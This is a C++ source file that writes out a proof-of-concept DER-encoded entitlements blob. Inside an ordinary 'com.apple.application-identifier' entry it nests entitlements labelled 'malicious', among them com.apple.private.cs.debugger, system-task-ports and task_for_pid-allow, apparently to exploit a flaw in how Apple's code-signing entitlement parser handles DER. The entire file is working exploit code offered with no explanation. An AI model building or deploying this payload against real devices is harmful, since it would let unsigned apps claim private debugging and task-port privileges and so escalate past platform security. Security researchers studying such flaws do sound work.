#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <vector>

using namespace std;

class Der {
public:
  Der(unsigned char type) {
    this->type = type;
  }
  
  unsigned char type;
  vector<unsigned char> content;
  vector<Der *> children;

  size_t getLenLen() {
    size_t content_size = getContentLen();
    if(content_size < 0x80) return 1;
    else if(content_size < 0x100) return 2;
    else if(content_size < 0x10000) return 3;
    else if(content_size < 0x1000000) return 4;
    else {
      printf("Length error");
      return 0;
    }
  }
  
  unsigned char *encodeLen(unsigned char *buf) {
    size_t content_size = getContentLen();
    if(content_size < 0x80) {
      *buf = (unsigned char)content_size; buf++;
    } else if(content_size < 0x100) {
      *buf = 0x81; buf++;
      *buf = (unsigned char)content_size; buf++;
    } else if(content_size < 0x10000) {
      *buf = 0x82; buf++;
      *buf = (unsigned char)((content_size & 0xFF00) >> 8); buf++;
      *buf = (unsigned char)(content_size & 0xFF); buf++;
    } else if(content_size < 0x1000000) {
      *buf = 0x83; buf++;
      *buf = (unsigned char)((content_size & 0xFF0000) >> 16); buf++;
      *buf = (unsigned char)((content_size & 0xFF00) >> 8); buf++;
      *buf = (unsigned char)(content_size & 0xFF); buf++;
    }
    return buf;
  }

  size_t getContentLen() {
    size_t content_len = content.size();
    if(!content_len) {
      for(auto iter = children.begin(); iter != children.end(); iter++) {
        Der *child = *iter;
        content_len += child->getTotalLen();
      }
    }
    return content_len;
  }
  
  size_t getTotalLen() {
    size_t len = getContentLen();
    len += getLenLen();
    len += 1;
    return len;
  }
  
  unsigned char *encode(unsigned char *buf) {
    *buf = type; buf++;
    buf = encodeLen(buf);
    if(!content.empty()) {
      memcpy(buf, content.data(), content.size());
      buf += content.size();
    } else {
      for(auto iter = children.begin(); iter != children.end(); iter++) {
        Der *child = *iter;
        buf = child->encode(buf);
      }
    }
    return buf;
  }
  
  void write(char *filename){
    size_t len = getTotalLen();
    unsigned char *buf = (unsigned char *)malloc(len);
    encode(buf);
    
    FILE *fp = fopen(filename, "wb");
    if(!fp) {
      printf("Error writing file\n");
      return;
    }
    fwrite(buf, 1, len, fp);
    fclose(fp);
  }
};

Der *createDer(unsigned char type) {
  Der *der = new Der(type);
  return der;
}

Der *createNumber(uint32_t number) {
  if(number > 0xFF) {
    printf("Unsupported\n");
  }
  
  Der *der = new Der(0x02);
  der->content.push_back((unsigned char)number);
  return der;
}

Der *createBool(bool value) {
  Der *der = new Der(0x01);
  if(value) {
    der->content.push_back(0xFF);
  } else {
    der->content.push_back(0);
  }
  return der;
}

Der *createString(char *str) {
  Der *der = new Der(0x0c);
  size_t len = strlen(str);
  der->content.resize(len);
  memcpy(der->content.data(), str, len);
  return der;
}

Der *createPair(Der *first, Der *second) {
  Der *der = new Der(0x30);
  der->children.push_back(first);
  der->children.push_back(second);
  return der;
}

Der* createPoc() {
  Der *wrapper1 = createDer(0xb0);
  Der *wrapper2 = createDer(0x70);
  wrapper2->children.push_back(createNumber(1));
  wrapper2->children.push_back(wrapper1);
  
  Der *benign, *malicious;

  // NOTE: all entitlements (both benign and malicious) need to be in alphabetical order
  
  benign = createPair(createString("com.apple.application-identifier"), createString("testapp2"));
  wrapper1->children.push_back(benign);

  malicious = createPair(createString("com.apple.private.cs.debugger"), createBool(true));
  benign->children.push_back(malicious);
  malicious = createPair(createString("com.apple.private.cs.debugger.safe"), createBool(true));
  benign->children.push_back(malicious);
  malicious = createPair(createString("com.apple.system-task-ports"), createBool(true));
  benign->children.push_back(malicious);
  malicious = createPair(createString("com.apple.system-task-ports.control"), createBool(true));
  benign->children.push_back(malicious);
  malicious = createPair(createString("internal.com.apple.system-task-ports.control"), createBool(true));
  benign->children.push_back(malicious);
  malicious = createPair(createString("task_for_pid-allow"), createBool(true));
  benign->children.push_back(malicious);

  return wrapper2;
}

int main(int argc, char** argv) {
  if(argc < 2) {
    printf("Usage: %s <output file>\n", argv[0]);
    return 1;
  }
  Der *der = createPoc();
  der->write(argv[1]);
  return 0;
}


